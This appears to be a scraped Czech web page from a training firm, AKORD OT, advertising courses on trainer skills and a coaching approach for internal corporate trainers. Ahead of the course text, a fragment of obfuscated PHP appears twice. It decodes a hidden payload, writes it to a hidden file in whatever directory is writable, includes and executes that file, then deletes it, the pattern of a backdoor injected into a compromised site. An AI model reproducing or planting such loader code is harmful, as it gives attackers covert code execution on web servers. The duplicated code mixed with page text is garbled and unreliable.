100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Lektorské dovednosti - AKORD OT

Lektorské dovednosti

Využíváte interní lektory? S naším tréninkem budou jejich kurzy nejen odborné, ale i poutavě vedené.

Trénink interních trenérů

Zaměření kurzu, komu je kurz určen
Kurz je určen všem pracovníkům, kteří působí nebo budou působit jako interní trenéři, a to v jakékoliv odborné oblasti.

Kurz je zaměřen na pedagogickou stránku školení. Připomeneme psychologické základy vzdělávání dospělých a principy procesu učení, společně sestavíme přehled metod výuky dospělých. Budeme sledovat proces přípravy, realizace a vyhodnocení kurzů. Hlavní část kurzu pak věnujeme praktickému tréninku s videozáznamem, následným rozborem a se zpětnou vazbou.

Dílčí témata kurzu
Identifikace tréninkových potřeb a nastavení cílů kurzu, definice tréninkového KONTRAKTU. Příprava kurzu - od cílů ke konkrétnímu obsahu, využití různých vzdělávacích nástrojů/forem, produkční příprava kurzu, komunikace s klienty před kurzem. Realizace kurzu - jak získat zájem účastníků, jak udržet pozornost, praktická doporučení k vystupování trenéra, práce se zpětnou vazbou. Možné formy hodnocení kurzu a jejich optimální kombinace.


Koučující přístup ve vzdělávání

Zaměření kurzu, komu je kurz určen
Nejvíce si lidé pamatují poznatky, které získali na základě vlastní zkušenosti, a ty pak také nejsnáze uvádějí do praxe. Proto je koučující přístup ve vzdělávání dospělých velmi efektivní a doporučovanou metodou.

Kurz je určen interním trenérům nebo těm, co se na práci interních trenérů teprve připravují.

Dílčí témata kurzu
Podstata koučujícího přístupu, výhody a bariéry uplatňování koučujícího přístupu, techniky vedení skupinových koučovacích rozhovorů, zážitkové techniky ve vzdělávání dospělých, praktický trénink práce se skupinou.

Comments are closed.